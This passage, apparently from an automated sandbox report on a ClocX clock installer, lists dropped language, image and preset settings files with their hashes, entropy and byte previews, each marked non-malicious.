Preview:	001,Kuvaa ei voi ladata!..002,Ajastinta ei voi k.ynnist..!..003,Yleiset..004,Ulkoasu..005,&K.yt.ss...006,Virhe lis.tt.ess. alfakanavaa!..007,Tuntiosoitinta ei voi ladata!..008,Minuuttiosoitinta ei voi ladata!..009,Sekuntiosoitinta ei voi ladata!..010,AM..011,PM..012,ClocX - h.lytys PC SAMMUTETAAN!..013,Taustaa ei voi ladata!..014,&L.pin.kyvyys (Win2k/XP) ..015,&Prioriteetti ..016,Alhainen..017,Normaali..018,Korkea..019,Aliasesto..020,&Ei k.yt.ss. (nopea)..021,&Tapa 1 (oletus)..022,&Tapa 2..023,Ikkuna-asetukset ..024,&Aina p..llimm.isen...025,&Kiinnit. ty.p.yd.lle (Win2k/XP)..026,&L.pinapsautus (Win2k/XP)..027,&Lukitse sijainti..028,&.l. siirr. n.yt.n reunojen yli..029,Kellon asetukset ..030,N.yt. AM/PM..031,Minuuteittain..032,&Tausta..033,K.ynnistys ..034,&K.ynnist. Windowsin kanssa..035,&K.ynnist. sis..nkirjauduttaessa ..036,&.l. muuta sijaintia (kaksoisn.ytt.)..037,Asetukset..038,&OK..039,&Peruuta..040,&Sulje..041,&Uusi.....042,&Muokkaa.....043,&Poista..044,&Testaa..045,H.lytykset ai

C:\Program Files (x86)\ClocX\Lang\Svenska.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2310
Entropy (8bit):	5.374266043513612
Encrypted:	false
SSDEEP:	48:WavowZsfFXA9JUCFRQijv1BMTZKNQgXVynztV9QmqAUaxMxviysDHO5Ltg60Kg:WavowEFw9JUMRQixByZaJV0zVxqAxzyM
MD5:	692A55F3A8B0D2240679A9A8F6CD8B83
SHA1:	2E58FAAB3B35F2C36F391E677932722949B66F8D
SHA-256:	3A5F18B977B2D40B832E362D5E3DB7B5A10EAF7DDBA793B830B60CA02FC7A9B4
SHA-512:	E0B456AD42EA6C5C04ACA3ED47EE6EFCD696E7DD46F8E68B425D34CA1228EBD20747D1AF932651CFE6506D17D95D277571156689163E82D5AE7D4BA590DD5A49
Malicious:	false
Reputation:	unknown
Preview:	001,Kan inte h.mta bilden..002,Kan inte starta timern!..003,Allm.nt..004,Utseende..005,&Aktiverad..006,Fel vid till.gg av alfakanal!..007,Kan inte ladda timvisaren!..008,Kan inte ladda minutvisaren!..009,Kan inte ladda sekundvisaren!..010,FM..011,EM..012,ClocX - larm ST.NGER..013,Kan inte h.mta bakgrunden!..014, Genomskinlighet (Win2k/XP) ..015, Prioritet ..016,L.g..017,Normal..018,H.g..019, Kantutj.mning ..020,&Inaktiverad (snabb)..021,Metod &1 (standard)..022,Metod &2 (l.ngsam)..023, Alternativ f.r f.nster ..024,Alltid &.verst..025,&F.st p. Skrivbordet (Win2k/XP)..026,&Klicka genom (Win2k/XP)..027,&Ej flyttbart f.nster..028,&Begr.nsa position till sk.rmen..029, .vrigt ..030,Visa &FM/EM..031,Varje minut..032, Bakgrund ..033, Start ..034,&Starta samtidigt med Windows..035,S&tarta vid login (anv.ndare)..036,&.ndra inte pos. (tv. sk.rmar)..037,Alternativ..038,OK..039,Avbryt..040,&St.ng..041,&Nytt.....042,&Redigera.....043,Ta &bort..044,&Testa..045,Larm sorterade efter tid..046,Namn..047,

C:\Program Files (x86)\ClocX\Lang\Thai.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2386
Entropy (8bit):	6.112058786166187
Encrypted:	false
SSDEEP:	48:Q0QaBfLuSJH+yK99GThN/+5l1VeiOmxzgSCQLQiTpCyB7XgAuP8XTu:Q0QaBfLuSJVK99ChY1V5VbXpCyB7XgTz
MD5:	5A008D847D9846DB2EB9D84B500FC407
SHA1:	F4DBD5725559F1FDE3497959F15F8E2DB01B9A60
SHA-256:	54991D21C1EA6C3C3C54FE68DAEFF96041DF96C4AE05E13B300C8E60A8DA3DE3
SHA-512:	43D253A8C72E444F5EB5430D31EA5ADFC4EF2D309CFB8859713195E8DD34756EEF988DE443CE7C3F429A670F0D8B1011A4B886DEE4D85985EED06B78DBFE0CCD
Malicious:	false
Reputation:	unknown
Preview:	001,.................002,.....................!..003,........................!..004,....................!..005,.....................!..006,............................!..007,.....................!..008,.................!..009,..................!..010,AM..011,PM..012,..... X - ...........!..013,.....................!..014, ......... (Win2k/XP) ..015, ....../... ..016,.....017,......018,....019, .......... ..020,............. (......)..021,..... 1 (....)..022,..... 2 (........)..023, .......... ..024,............025,.......... (Win2k/XP)..026,........... (Win2k/XP)..027,.....................028,...............029, ............. ..030,... AM/PM..031,................ PNG .......032, ............ ..033, ............... ..034,...................035,............... (......)..036,...............(.2 ....)..037,.............038,&.....039,&......0

C:\Program Files (x86)\ClocX\Lang\Traditional_Chinese.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1902
Entropy (8bit):	6.37456130870283
Encrypted:	false
SSDEEP:	48:u8hbLlIx/SDsjUqJPgocfhc65yk8mGaEQNcbqCgjkpRqM4LkXNfua2SiuPCnXTu:u8llIx/SQ4qJPWfhc65yJAElwkAkdH6y
MD5:	1087C3F3DDD9CC72492C6CE37579D069
SHA1:	3E715A01456D0421D6C407538A69E670CC18A512
SHA-256:	0AB5DF5226313D018060B308AF3DB6C5C9CACF7A1985607C3542380268076F56
SHA-512:	34E928146D5B26E9C2F532392DB15BACCE94AB9A36C93C3D398199E667474E3571938CCF425363D35E19C2F9E928C159A5792B10392122423C699FB5FE26F8AD
Malicious:	false
Reputation:	unknown
Preview:	001,.L.k...J.....002,.L.k..l..p...!..003,.@....004,.~.[..005,.....006,...~.[.J alpha .W.D!..007,.L.k...J..w!..008,.L.k...J...w!..009,.L.k...J..w!..010,AM ..011,PM ..012,ClocX - ........!..013,.L.k...J.I..!..014, .z.. (Win2k/XP) ..015, .u.... ..016,.C..017,.@....018,....019, ..O.W/..... ..020,.w.... (..)..021,..k 1 (.w.]..)..022,..k 2 (.C)..023, ....(....).. ..024,......W.h.....025,.....T.u.. (Win2k/XP)..026,.........k.... (Win2k/XP)..027,...i..........028,.......i...X.....029, ....].w.. ..030,...W..(AM)/.U..(PM)..031,.C....032, .I.. ..033, ... ..034,.H Window .}........035,.H.n.J (...) ......036,...n...]......m..037,....038,.T.w(&O)..039,....(&C)..040,....(&C)..041,.s.W(&N).....042,.s..(&E).....043,.R..(&D)..044,....(&T)..045,............046,.W....047,.....048,.....049,.... %d ....050,.C....051,.C.g..052,.C....053,.C.~..054,.@....055,.....s....056,.W..:..057,..{:..058,...: ..059, ..@: ..060,............061,.....y.z:..062,.... WAV ...

C:\Program Files (x86)\ClocX\Lang\Turkce.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2241
Entropy (8bit):	5.3993674147697766
Encrypted:	false
SSDEEP:	48:vfuHDUxQ2FPl6UoFzHioqkIqKpyLm50pN+b2DFFakIss2q8WeHSwTu:vfSgxQ2FtxAzfIpyLHN+qPm2C6Tu
MD5:	AF5BF71BF65C85430F339FD263D19E60
SHA1:	5004E292E76559C176A0A2BDA06FDD75AA0788EC
SHA-256:	4298489EA4E99BB8CF68C0051312D10424E17026A82A868F9FBE16014244100D
SHA-512:	63B811EE7A5EB2E3EA667AFB23823EED3FF798F3168571215644029EA3A942935091778C20E56D55BAFF3C2A5D3A285F6B2A2ECD5385C784A0622A85E199A103
Malicious:	false
Reputation:	unknown
Preview:	001,Resim a..lamad...002,Zamanlay.c. ..z.mlenemedi!..003,Genel..004,G.r.n.m..005,&Etkin..006,Alfa kanal. eklenirken hata!..007,Akrep i.areti a..lamad.!..008,Yelkovan i.areti a..lamad.!..009,Saniye i.areti a..lamad.!..010,AM..011,PM..012,ClocX - alarm KAPAT!..013,Arkaplan a..lamad.!..014, &Transparanl.k (Win2k/XP)..015, &.ncelik..016,D...k..017,Normal..018,Y.ksek..019, Antialiasing ..020,Etkisiz b.rak (&h.zl.)..021,Methot &1 (varsay.lan)..022,Methot &2..023, Pencere se.enekleri..024,&Daima .stte..025,&Masa.st.ne ..nele (Win2k/XP)..026,D&o.rudan T.kla (Win2k/XP)..027,O&ynat.lamaz pencere..028,&Pozisyonu ekrandan k.s.tla..029, Haz.rl.k se.enekleri..030,&AM/PM G.ster..031,Dakikal.k..032, A&rkaplan..033, Ba.lang....034,&Windows ile Ba.lat..035,Ot&urum ile Ba.lat (kullan.c.)..036,Po&zisyonu ayarlama. (dual-monit.r)..037,Se.enekler..038,&Tamam..039,.pta&l..040,&Kapat..041,Ye&ni.....042,D.z&enle.....043,&Sil..044,&Test Et..045,Zamana g.re alarmlar..046,.sim..047,S.re..048,Tarih..049,%d. ayda g

C:\Program Files (x86)\ClocX\Lang\Ukrainian.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2325
Entropy (8bit):	5.813118990170243
Encrypted:	false
SSDEEP:	48:1liKJBTGlVWryPQ42xZZW8KVIFND5i394wtoPlnjp3uPAPxM:1liKnTGlVSyIzZW8KVIFtwZoq4m
MD5:	D10E2A8BCCCAF9EFF46D453E6FB127D0
SHA1:	7C7A5C843C6B8FB615CBF30DE329A1505276450C
SHA-256:	7608128E882E3A34CFC48A35DA9C2F1C77BD07B491EE4BD1D6D48BB425CB68BD
SHA-512:	E600F8345D0F17D920C01EC47EFA6AA76F1608834AC4390D0F489A24B59EDF94B7707AAA51EB9FD0D462483C465A44187EA72AFBF99747F13262862FCA0FE0BD
Malicious:	false
Reputation:	unknown
Preview:	001,.......... .. .............!.002,.. ........... ......... ....!.003,.......004,..........005,..........006,....... ......... .....-......!.007,.. ............. ....... ......!.008,.. ............. ........ ......!.009,.. ............. ........ ......!.010,...011,...012,ClocX - ...... ......... ....'.....!.013,.. ...... ....... .......!.014, ......... (Win2k/XP).015, ..........016,........017,...........018,........019,...........020,............ (.......).021,..... 1 (...........).022,..... 2 (........).023, .... - ...........024,... .... .......025,........ .. ...... (Win2k/XP).026,........ ... ........ (Win2k/XP).027,........ .....028,........ ...... .......029, ......... ...........030,.......... ../...031,Minutely.032, ....... ........033, ..........034,...... ..... . Windows.035,...... ... ... ............036,.. ........... .....037,..........038,&...!.039,&.......!.040,&.....!.041,&.........042,&..........043,&.........044,&.........045,........

C:\Program Files (x86)\ClocX\Presets\AJ-CityHall-500-hour.hpng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 181 x 27, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1350
Entropy (8bit):	6.69981675807187
Encrypted:	false
SSDEEP:	24:m6y1htZdWwjx82lY2T3pHEVbuYYiyJ3Vbq4G6SA9dGogWH+192AotNLFFg2u:twqNn2SATJ3X3feH2JF6
MD5:	CDBC4ABB27F64B3E4073D798D205B5B7
SHA1:	58577123B1D59FCCFB80A588D92C11F447258A23
SHA-256:	5821718C8E53A8ACD10DD52C12E451E88F3DD7CE94332E6406490DF2459823D3
SHA-512:	B6B3F5F8120DEDBC27A39DE98E5F6CFDEA6C2B11C6E5C2E960A4C16E37C8D752D4F0103D494E03FB5C2C7FA9C4BBDDD16B51D0CB8B87602FC83C5519BE98D3F5
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............>.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5.1 Windows" xmpMM:InstanceID="xmp.iid:D3C59E439F2011E18651C5CDA301D5A0" xmpMM:DocumentID="xmp.did:D3C59E449F2011E18651C5CDA301D5A0"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D3C59E419F2011E18651C5CDA301D5A0" stRef:documentID="xmp.did:D3C59E429F2011E18651C5CDA301D5A0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..F.....PLTE...333fff...{{{......BBBHHH.......................???TTT'''NNN```............xxxuuuccc..............---...

C:\Program Files (x86)\ClocX\Presets\AJ-CityHall-500-minute.hpng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 230 x 5, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1115
Entropy (8bit):	6.213566468733229
Encrypted:	false
SSDEEP:	24:uLy1htZdWwjx82lY2T3pHEVqSacyJ3VcHJqlGZE+JMGzl0s2snMj:mwqNn2S8JPJ3K4l+J0dj
MD5:	8619F256A096C9E1AD177F97B799D82D
SHA1:	9EEDCB61BB671006830D76A89969CE962C4F6813
SHA-256:	6B4041B6DFD71C01E16016D5CC98A950951A1B44A3FA0CE48A7668BD4A229853
SHA-512:	2B954763605B7F082963EBCDD3213F30E0DECA1C5E3B06B720142887A18CA6FB8BCF4D429C05432F45529E33F062E10E69F39855FD9E109BBF949F79080FD813
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.............fd`.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5.1 Windows" xmpMM:InstanceID="xmp.iid:2EB4C5F39F2211E18513A81FC2AFE6F4" xmpMM:DocumentID="xmp.did:2EB4C5F49F2211E18513A81FC2AFE6F4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2EB4C5F19F2211E18513A81FC2AFE6F4" stRef:documentID="xmp.did:2EB4C5F29F2211E18513A81FC2AFE6F4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.Ti]...TPLTE......?>>NNN......!!!tss(''......DCC.........=<<............]\\...&%%...100............c....tRNS............

C:\Program Files (x86)\ClocX\Presets\Adler.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 130 x 130, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	55630
Entropy (8bit):	7.986980389473075
Encrypted:	false
SSDEEP:	768:AvEl7OYQJBlmbnzl7WWsHp8Oi4rdq3mQYomnVb6kanEpHVjaBqUXz:xYmbzoWACO1rd7QYoeWERsz
MD5:	0429009042C10C55BAA8A1399E50439A
SHA1:	3E1290EDE1D59D407747B2549E5E377CE1EBEF2D
SHA-256:	B7CD2C45291C1912745BFBAB53D09DEB7807F5D7343BDD258A44D47B9B1BC9D8
SHA-512:	B94907B7966E2BD14FD3C918ABB8BE692007836942FB4A59882419B7F6E4FDCED1EBC012CCD3A2BA3986AA395F59251A4E094E980AAE22CD546ABA25C300F5C0
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.....................pHYs...:...:.d.W.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F....IDATx...n.a........6..../.E..4.4.ua..iI.5.V.N.b.P.j........,B..a...O...&.....l.{.:m...nc7.......N..\|..A...`8.g.H..C...+V.......Ym089%oI...6.......Q,9...no@...L..d2a..Tj..7Hiy\..0+D.q.#..v.]&....d...=.NxS......W...ta....%1.pI<.Y......LH<.{'..V...../.7..h$soG5o.+.S.F.f. .6Z......6.]A..Q..M.q...x}..X..#g...s....F<...........#S1..S...=M..s w...G.vj.r.D2...(.6bd.%./..2.........a('.}G.0.x...........p.....m..p..IsW.Uu.K.=..\v7$..Op......~y...J.......(...V..Q!....k~e$7=.(.t..z.....{.O_.v..]....;..`..u.....v.:0..3.^5...@...p....]...n.{\i....Vm).0.U^q.....W........;.g.w...9.]<r...g.......!...#..G...........?2...h`.._...u.c...GG........R.?2..{Aa......L..b...k..........\.;$..@.....\|.N......o...`.x..u..N...}.s..on.......M..w........[.G.........6..^........W/._U...S....]..wuo.....S...M-k.tM...%.........;..fz......a!E..\|...............

C:\Program Files (x86)\ClocX\Presets\Alte Standuhr.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	946
Entropy (8bit):	4.661831809454109
Encrypted:	false
SSDEEP:	12:a4EqmYrrrcRQBjpJrprh27XFPV+J/PnXFPVG99XFPUXFqC2kpmdoH9Gs968v2ims:BEQrmu95UTOxf01kKkp5dG/8+i4352X
MD5:	1ED534D32D9C5AEC051584FD4F4A6AC0
SHA1:	69FFD3F42B20EA7F0D8ACF48A914265A2B03ED59
SHA-256:	F247ED947B0F833783B876902185821E47283039ABA7114F114EDD889CF04F45
SHA-512:	996F90AD4E516474F1632164164410BDC791A994664A6DD227AEFDBAE9556B6E86A48720F9C52BA6C1FBB896DE958F114A35ED9E6FAAB10724B971D9C6A47F85
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red)..DisableAMPM=1 ;show AM/PM indicator (default 0)..AMPMColor=0x787878.;color of AM/PM indicator....HourColor=0x1F4CA2 ;color of hour hand..HourLength=15 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=2 ;width of hour hand....MinuteColor=0x1FFAA2 ;color of minute hand..MinuteLength=30 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=1 ;width of minute hand....SecondColor=0xF7FA92 ;color of second hand..SecondLength=30 ;length of second hand..SecondLap=10 ;overlap of second hand..SecondWidth=0.7 ;width of second hand....;CenterX=68 ;center point's X (default image_width / 2)..;CenterY=66 ;center point's Y (default image_height / 2)

C:\Program Files (x86)\ClocX\Presets\Alte Standuhr.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 140 x 165, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	45581
Entropy (8bit):	7.983167078747716
Encrypted:	false
SSDEEP:	768:TnOKv1UzMqfrTun4WXmRdkWKGoHfX7Yik3gAv2zMpr6VPtJHj2M4hmH4G:TnOKNyMqfrXjkWKGoHfX7YiInhpr6VrJ
MD5:	C09624E5A94C36866D9BF05A3C07DD33
SHA1:	A98ACA5BA10EA2187BF11CC506BE2FA893AEAA79
SHA-256:	7E59083736758B2575545383BB8ED07EF79972D4ED3AB08F78B367528FAEB596
SHA-512:	00F2F02EDCD6A5BCFD9037378A58F2BA3D47CBD010A3EAB9B9A62E46535DCCD744888BBB6FF7C48FCF5EB02CAEF0634DEAA2129CE496E5CF64EE79CF0E56CF9B
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............c......pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F....IDATx.b...?.(......b...Q@......3.H...4.`F.I. .F..( .....H.........?....13..............32p}\.>..hR....b.).....l..~...k.LffF....33........gf...?.......$...0..../..........g.+!V...&.t........h.'.....O..7...........0..a`eab...d...d...'.o?.~...N,....,.L.LLL...^3....L....11\|......_.........KT..g...#%....^n...(.>...C.DSt..[.4@.,..=...AB(...9..6R.=....+O.hrM}.....6.........H.>.x.". p..>.I..../H.j.....`.(..d..K.........e..[.P.........K0.....}.....O..>v.Q>Qp......._...T....0pss3.e.....o..?...........O.\,l.....SP.........._`........l\....@U......g/..}.yVD..v.....5....H0i...~....`.L{.../>v{.....o>1\.v........O..Px.../........._.o..0.s.K.`...?.........P..?0..b..,....\|Ap..../...o....LGG...o ....\?..rp..2sp..."..pJ0...1w...(.^.\|p...$j.....].{0..-X..?D2:8q.H....\|..'....Y.w.....!C:...^8_.X.`.....&(..4.. 9.Aq4.#..lU...7Y%.%....V1.....C4. ..s..h4@:I...K....y..\|

C:\Program Files (x86)\ClocX\Presets\Amarillo.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 176 x 176, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	24329
Entropy (8bit):	7.9041850094582715
Encrypted:	false
SSDEEP:	384:Pj/Jv0KxBi7S2563Y7bY45Bi3cmrt05iuxtrjFrF27F0JP6BSyk:P7JVx+7cYHH5M3cS053LrjFrswPxyk
MD5:	0BC808A35C32957F3C115DE1593263AF
SHA1:	639DFF4394E4739E48B8647E24BF5CA055975482
SHA-256:	4807722EB149030D3BE8DF0D51FE0B0232CA618360D7982F637F9560A00488E2
SHA-512:	158642B2FAEBF5901781BDF56A2BE7E7E21225CC48A6AC0CEFA5A463B95466792868843A96BB975A9E0076225FA150BE66B0DDC25ED88C60BDC76B2F18E9A32A
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................^....pHYs..u0..u0..3r.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..^.IDATx.b...?.(..C.....h.......h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!....e4.....L..........X...A.H...(...1?.s.1'..B.....@...?..{ ~....3<..O.......@.nE....M... .....Ag..>...&R. ....@......%..... ....../.W..8....@..&`....L..@.......(...H.....T.D....@\|..;.L..Gc....h.'..N&Pb..b; ..&<.\....E/...?.D..H...C@\|.........4".00.... .L.....5m2./Uq'bF...X.../.......Y.A...o.....@~.. ..Q.1.Hi._.q.u..%^..5J.(....qA.../.yy..6....7....m....E.@$.D..t.c6...Z....$S(..../..#.......U.;)a..Ms!g...........aX....}.WA.....%..u........"]Z....H<.x ..j0H....?w...~...0............CmJ.Y&.t..h.Y..}.)K..sG...O....~......A.....ms.1#.:....%7.....]O....{..a....W...B.i1..uBO.(%,....&FfV`".a....ca ..&XP........f.6..C.......o`...L......o.^.&.G.....'...XJh....Y...&.7.1...h.%``...&.H`:..r.1.-..L..,...UEE...

C:\Program Files (x86)\ClocX\Presets\Apple.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	21840
Entropy (8bit):	7.867040497269375
Encrypted:	false
SSDEEP:	384:5tGsRrRU7jBNZv2+ytf2IbDeKuY2PDuRuxm6Cilnov4fsxqZlQ:ukRANuHlzHVa0i9R7sxz
MD5:	17A826CF3E44BE13DC3D3077BCE71456
SHA1:	2B4067840DB9403BC4DFF49DD0B4CBC686830003
SHA-256:	3E693BCD12D1BEEEAE1A419286539DADCBAAA970DC39EC0E4C928431B89684F0
SHA-512:	423DA5BE9D159473FEB5A3D5718E5DCF45BEF5800CCA64C4D9A37C852A0BECE919209B328F75DAEDAD6D850B8B79A90C72D6086F92349423670C9B5CAA793679
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..T.IDATx..MJ.P....4I....UZEg...At..=8r.b.....33.:Q..(..Om^...t....f....\.h....:..w4...:TrF..).O....6...%...N....H...#.^@..FX....l......j.5.U....9.... ..9}@.6.EU..z...O.oX.......w.Q.........Z.......".....'.<.........5...K=_.$z....'.~.!.X.F.)..N.@,...oWn1..Na%;&..CN.....e.A...../.....g.~.}...........h4........d...V.A.`.s....bdbf...7.....RL..........._.??>...j..L...4.....~p...C@6.....K....,...@..Hg........=.(.0232p..\|.A........... .F...R.._u.!..6..D..y9`,.c... ...Z./0.r>.+....3..3..........l.0..... .F.....g..-Z./c.....l...7L..,P6.B`D3pq03..1..01\|......?......M..F._.HI0..@..&.....].......Ll..H...GPq..............AR..A.....?..>.c.....??>.....7P.;....M.......h4..E>.;.)..../5...K.\........,...T...NV..1!v.).....vp...;0n...~...............lP.a.`P%....&...=.....7....=..^3.....................g..be...b.....\|6p.................><y.t..R..o0....hX$.FFfh&....K.....

C:\Program Files (x86)\ClocX\Presets\Aqua.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 116 x 117 x 24, resolution 2834 x 2834 px/m, cbSize 40772, bits offset 54
Category:	dropped
Size (bytes):	40772
Entropy (8bit):	4.180879268207736
Encrypted:	false
SSDEEP:	96:TWMaS6iyEE7D4blhUraVHX/6bLtqUtC8D5zd8R2YuIHwD555D51vyRI/Bke9HAmx:TWuVy+mVWIZWYKmJ
MD5:	F80744C019A522AF5A4BDB6B9D99229D
SHA1:	FD7067AB7257FB030B05DFDECE58C7CF532160B6
SHA-256:	BE88E238CD1428C247D1D9E8504746D07A564C75D0F82173A4BBC38BF64C5E14
SHA-512:	EECD1A42F5E97F4D4EA045A64B1176AEF91B9BFE7F57D4DE19EBCBECD50B5EA4E269C62F1C82AAE155573F1676314A0366EF512687CFCEA805B18DDACF831A40
Malicious:	false
Reputation:	unknown
Preview:	BMD.......6...(...t...u....................................................................z`.X7.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.F".S2.pT.............................................................oS.C..f@..b..........................................................................................................................................................................................j.nG.J%.fH...........................................N(..[.......................................................................................................................................................

C:\Program Files (x86)\ClocX\Presets\Aqua.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	30483
Entropy (8bit):	7.932354142916476
Encrypted:	false
SSDEEP:	768:3fQkIoTw9vw5VugTvrBRCKbhNE3uJJD1GYP71q:vQ6CIVuGTvhbLE3iYqq
MD5:	73E7B2F60F8AC6FDE449861AC5484755
SHA1:	FF314467B04E04A70C2BCAF2C5E65C1C7B5D9274
SHA-256:	81DC5E6439F08EDEA70408774E1195FB2D01BE1AAE88B0A157EB7E8BC342DDA3
SHA-512:	EA9A4C1A3F9897AC96D3A3111F6F1D5BBC32EDAE25B4D69FD47144E5FE5970823C3FCF81D45EBB950BDFFB16CFA5CE0963F220F08BBF942A0BCFCAA025A0CA64
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..v.IDATx.b...?.(... ..........D...=............bddd...@..H3A.....@....3......3..33...^.bX.l..'..b......b....faaQ.F...........-...$.L..@6.01p...131..P...?...H~..O@......_.....m`.x.....-{....a.n..4$K.>>>..N.&6v6...Fs^^^.A.Ac`...#......._..}.{.......3032C. aF&.&&Fxb.a.9...........(....>^.~......~...LIi.._.~.......>......!..,-,A.....n.......3`...9.........A.....e...?,..fb.E0...'.&pB......D...........33.L`"....\|...;{z.zO..w..80d.. ..D........uvr........:0..A....,...H.. 1P....:(.Ab....rPdB.A...L.H.I.0........@9P....4(..@h`"..L.7.....n^.z..;w..". ..m....g...Vt.s........3....?...#......e.../.? ......g.dm..?...~.K.?..@."%.P...y......XYY..X..........889.lH..1.?.f..eaa.'$.~X).2C@@......\|.r..]...\....;w.e8..`..q...(.. 1...p..I<........Vx.m,..f.a....p...j.1....8.......D..4.-.......a......\|.....0..Z.c..W...J5t}.....[..N....0........Y.!^.H..I...@.A.....A8

C:\Program Files (x86)\ClocX\Presets\AquaB.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	962
Entropy (8bit):	4.5949957780877515
Encrypted:	false
SSDEEP:	24:BEIrIA83TORXFB01rfjkpWdGm8xiF0ZJGi:BzucFKuMdGmEZJp
MD5:	1A89EDBFD22BA1D75DD1B647D14ACF19
SHA1:	E2B42F0A5751BE735F9F1C253B1054DC0A21818B
SHA-256:	69E4CBA68588981E07949CF2B90D506F7139E5DDEB0922D84ABFECB6ADA8D666
SHA-512:	CCB1472901B66F0F7E24F57F1ACE692972421871B2B039202948126A2F007155CCDB7424B9FC1E80017870F1524ECDA1AE6E452E9678413B9CF8101ACE0D6F9E
Malicious:	false
Reputation:	unknown
